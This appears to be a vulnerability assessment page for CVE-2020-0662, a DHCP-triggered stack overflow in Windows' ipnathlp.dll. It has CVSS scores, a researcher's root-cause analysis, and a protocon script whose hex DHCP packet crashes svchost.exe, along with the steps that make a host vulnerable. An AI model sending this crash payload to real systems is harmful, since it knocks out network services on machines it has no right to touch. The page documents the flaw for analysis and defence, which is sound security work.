8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
A remote code execution vulnerability exists in the way that Windows handles objects in memory, aka ‘Windows Remote Code Execution Vulnerability’.
Recent assessments:
zeroSteiner at March 17, 2020 8:31pm UTC reported:
Analysis performed using ipnathlp.dll from Windows Server 2019 x64 (sha256: c5bfdd192eaac8ffa8c0ee9c5fbb719eb739518a0635dc5cba42f52ab7efefa9)
CVE-2020-0662 is a stack based buffer overflow occurring in svchost.exe
due to an unchecked size argument to a memcpy
call in ipnathlp.dll!DhcpAddArpEntry
. The size argument is restricted to 0-255 inclusive as it must fit in a uint8_t
variable. The size argument for the affected memcpy call is taken from the “Hardware address length” field from a DHCP/BootP message.
In order to hit the vulnerable code path and trigger the bug, the size (hardware address length) field must be sufficiently large, and the DHCP option 53 / 0x34 (DHCP Message Type) must be omitted.
The following protocon script can be used to trigger the crash:
# Dynamic Host Configuration Protocol
# Message type: Boot Request (1)
# Hardware type: Ethernet (0x01)
# Hardware address length: 255
# Hops: 0
# Transaction ID: 0x5df26992
# Seconds elapsed: 1
# Bootp flags: 0x0000 (Unicast)
# Client IP address: 0.0.0.0
# Your (client) IP address: 0.0.0.0
# Next server IP address: 0.0.0.0
# Relay agent IP address: 0.0.0.0
# Client MAC address: Vmware_84:05:fd (00:0c:29:84:05:fd)
# Client hardware address padding: 00000000000000000000
# Server host name not given
# Boot file name not given
# Magic cookie: DHCP
# Option: (255) End
# Option End: 255
set encoding hex
send 0101ff005df269920001000000000000000000000000000000000000000c298405fd0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000063825363ff
exit
On a Windows Server 2019 installation, this process is protected by stack cookies making exploitation non-trival. The cookie value would need to be leaked and the service which hosts the DLL is not configured to automatically start. To make a system vulnerable, an interface must be marked as “Shared”. To do this:
Open the power user menu with Win+X
and select “Network Connections”
From the Network Connections window, select “Change adapter options”
Right click an adapter which has an internet connection and select “Properties”
Navigate to the “Sharing” tab and check “Allow other network users to connect through this computer’s Internet connection”
Click “OK”
ipnathlp!DhcpProcessMessage
ipnathlp!DhcpProcessBootpMessage
* Only invoked if the DHCP Message Type option is omitted
ipnathlp!DhcpAddArpEntry
* Second `memcpy` call is the vulnerability, the size argument is
under attacker control
The target process uses stack canaries, so overwriting the stack would
require a leak. The original structure is a MIB_IPNET_ROW2
instance. Of note here is that the PhysicalAddressLength
field is
located after the PhysicalAddress
field and is set before the memcpy
call. This could allow an attacker to overwrite the this field.
Immediately following this operation, the row is passed to
iphlpapi!CreateIpNetEntry2 where the PhysicalAddressLength
field
is subjected to proper boundary checking (<= 0x20).
Windows 7 does not appear to be a viable exploit target because the affected memcpy
call is not present due to an older API being used. There is a memcmp
instruction to which the size parameter can be controlled but this would result in a OOB read which is much less useful.
Assessed Attacker Value: 3
Assessed Attacker Value: 3Assessed Attacker Value: 3
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C